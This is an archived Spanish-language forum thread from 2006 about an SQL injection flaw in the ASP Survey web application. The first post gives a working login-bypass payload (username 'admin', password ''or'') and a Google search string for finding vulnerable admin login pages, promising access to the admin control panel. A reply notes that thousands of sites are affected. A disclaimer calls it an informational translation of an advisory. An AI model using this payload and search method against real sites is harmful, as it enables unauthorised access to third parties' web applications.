PDA

Ver la versión completa : Inyeccion SQL en ASP Survey



(Not'Found)
12-02-2006, 03:10
Software Afectado: ASP Survey

Texto de introduccion :

Hola chicos
Esta es una simple inyeccion sql en la aplicacion web (ASP Survey) con esta vulnerabilidad. Deberemos ir a la pagina de administración

Direccion del objetivo : login.asp
Fabricante : ASP Survey
Exploit :
User: admin
Password: 'or'

Hackeando:
1. Buscar en google.com como :
Buscar en la web:"Survey Administration Login"
y escriba el exploit en el orden correcto...
y ya tenemos el Panel de Control de administardor.
-------------------------------------------------
Esto es una traduccion de mfoxhacker que pueden ver en su version original en http://securityreason.com/securityalert/414
Con este texto no se pretende promover el delito sino informar sobre una falla para que tratemos de evitar posibles daños en los stios que creamos

clarinetista
12-02-2006, 14:20
Aqui posteo mas info sobre la aplicacion, para el que no sepa lo que es.

http://asp.loftin-nc.com/ASPSurvey/

PD: Vaya pasada, hay miles de webs afectadas